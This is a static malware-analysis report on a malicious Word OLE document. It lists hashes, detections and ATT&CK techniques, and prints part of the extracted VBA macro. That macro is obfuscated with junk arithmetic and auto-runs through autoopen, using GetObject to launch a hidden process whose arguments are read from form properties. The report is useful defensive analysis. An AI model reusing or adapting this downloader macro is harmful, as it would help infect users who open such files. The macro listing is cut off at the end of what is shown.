Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 34ddb84de696b5a8…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 153.2 KB
Created: 2019-03-20 14:29:00
Authoring application: Microsoft Office Word
First seen: 2019-04-21
MD5: c31014a9efd10203cfa48028ca928392
SHA-1: 132ddc2d64254fa33db5bad7f7a93ad010fc7ab6
SHA-256: 34ddb84de696b5a8a8cf0423c5b3fb9dfddf608f218095f7e39e97d9eefc9c51
Risk score: 222

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic; T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros. The 'autoopen' macro uses the GetObject function, a common technique for executing embedded or downloaded payloads. The ClamAV detection 'Doc.Downloader.Sagent-6902866-0' further supports its role as a downloader. The specific download URL is not directly present in the extracted evidence: the arguments to GetObject are read from properties of the bxDkQAB form module rather than appearing as literal strings in the macro source, and the only URL carved from the document body is an OOXML schema namespace, not a download location. Even so, the presence of VBA macros and the GetObject call strongly indicates a downloader pattern.

Heuristics (7)

  • ClamAV: Doc.Downloader.Sagent-6902866-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Sagent-6902866-0
  • VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call [high] OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename | Kind      | Source                                                  | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 15299 bytes
SHA-256: f1a246bbe6f80e3f29b2f9e22613e4a61c4aa682eba73a4521571d59627afa5c
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "VAAwABo"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "bxDkQAB"
Attribute VB_Base = "0{4ADD271E-62B3-4FC3-8D5F-5DAA1FB64C78}{8F2D98A8-7A22-4C62-9499-C611BDF06611}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "FBU_GAUQ"
Sub autoopen()
On Error Resume Next
   If bkUAAGAQ = AcAABw_ Then
      iXZAcADc = 818984927 * CInt(870248260) / _
661857214 + Sqr(801325567) * 206703840 / CInt(999715560) * (213071604 * 812693045)
      qcAoAZ = (300041760 - Asc(VUQQBDB) / CDAAAG4G / 837334000 + _
wAAQcGBA / Fix(807015819 + Log(XQAGAADD * Sgn(456405636) + YQUQAAZA / CSng(650021952))))
End If
   If WwAQ4D4k = kAQk1QB_ Then
      dQ_AcC = 931148952 * CInt(87174455) / _
975000336 + Sqr(383662918) * 109379300 / CInt(600710954) * (172450687 * 373407569)
      uBDAGA = (278084938 - Asc(wCABxXBk) / uAkQAAZ / 162012456 + _
F_UADoAD / Fix(669892230 + Log(NBAxx4A * Sgn(952752119) + YAxZ_QQ / CSng(728383211))))
End If
   If hAQDBA = Ex4ADAA Then
      iQDDB_ = 412887974 * CInt(634221319) / _
129733626 + Sqr(54445718) * 206005216 / CInt(714414628) * (564723357 * 530991518)
      RkADQDBB = (535993688 - Asc(GUXwD4cc) / ADBDAA / 990022775 + _
bZUXAAUA / Fix(381897607 + Log(oBAA1w * Sgn(930938977) + FBBBZA / CSng(30944015))))
End If
Set OGXoDB = GetObject(bxDkQAB.Y1BxADo)
   If wAAUQxA = MCBDxU_k Then
      kA4ABAA = 934535510 * CInt(918861163) / _
219172688 + Sqr(23570679) * 824949853 / CInt(547517805) * (373519339 * 16479815)
      qCACAAXA = (788865896 - Asc(loBwA__Q) / vAxDB1A / 420566520 + _
SAAAAA / Fix(651542787 + Log(WAAZxwAD * Sgn(812284043) + uwAXAA / CSng(882054045))))
End If
   If OAZAxAAA = BXAAXCU Then
      TCCAA_ = 99052273 * CInt(72248205) / _
703550566 + Sqr(818230063) * 53132344 / CInt(706909604) * (196099915 * 401345730)
      K_AADDQ = (92390653 - Asc(cXAAUxBA) / QGAQAB / 557796722 + _
nAQAAc_D / Fix(547186464 + Log(JoAACoA_ * Sgn(407622150) + UoQAQA1U / CSng(544333238))))
End If
   If YkAZXDDD = Z4AABA Then
      sQUZk4 = 675471138 * CInt(244123964) / _
360916293 + Sqr(345151611) * 53110634 / CInt(477692344) * (263086134 * 83001223)
      bXXxA4UA = (888986178 - Asc(nAAAUAA) / OccAAC / 9558557 + _
woAc1k / Fix(644149644 + Log(uADG4X * Sgn(74501564) + GAAAAD_ / CSng(670649822))))
End If
OGXoDB.ShowWindow = 356019 - 356019
   If qBAAABAD = wB4UA1Do Then
      ucBQkA = 900992713 * CInt(81762444) / _
858036521 + Sqr(449516603) * 115055982 / CInt(304942463) * (624910223 * 776633603)
      wUGZocQ = (12292019 - Asc(WGAAAG4A) / OwA4CcZA / 673731292 + _
rxADUX / Fix(997417007 + Log(XQcD4AAC * Sgn(794626535) + SUoDU_DB / CSng(895512750))))
End If
   If Y4BG4_AD = bUGDXA_A Then
      aBQZAA = 148453590 * CInt(632082997) / _
443664009 + Sqr(190605587) * 698409771 / CInt(31221876) * (16190019 * 312953570)
      SQQkAx = (791713505 - Asc(rABAADZ) / SAAA4C / 316730691 + _
w1ZUDACB / Fix(680729175 + Log(DZQAkw * Sgn(898885597) + jkw1ACB / CSng(203643703))))
End If
GetObject(bxDkQAB.X_AwZUA). _
Create# tQ4ABQC + bxDkQAB.A_A4UD + wXUAwBx + bxDkQAB.Mw1A1Awx + d_wCokAo + bxDkQAB.ZZBUoG + FAAUAX, A4GUBckA, OGXoDB, jZoDBXA
   If uDwoBA = QBA1o_ Then
      YxxAA4o = 525730236 * CInt(842812733) / _
431672444 + Sqr(164576374) * 788601371 / CInt(250492118) * (961779926 * 829852977)
      FXAAAABB = (842791072 - Asc(iADAQZ4) / GAAXUA / 403480656 + _
DDAABAAA / Fix(690434272 + Log(XQ4A_oUD * Sgn(522870338) + RkC41ACw / CSng(591593070))))
End If
   If wc1oAAx = BBBUBoA Then
      fAD_ZCQA = 363077685 * CInt(569216700) / _
40333973 + Sqr(289736201) * 399145316 / CInt(548857396) * (468572668 * 363601893)
      FGZDA4ck = (710304794 - Asc(TAcAAcAD) / RD4UAAA / 623017496 + _
... (truncated)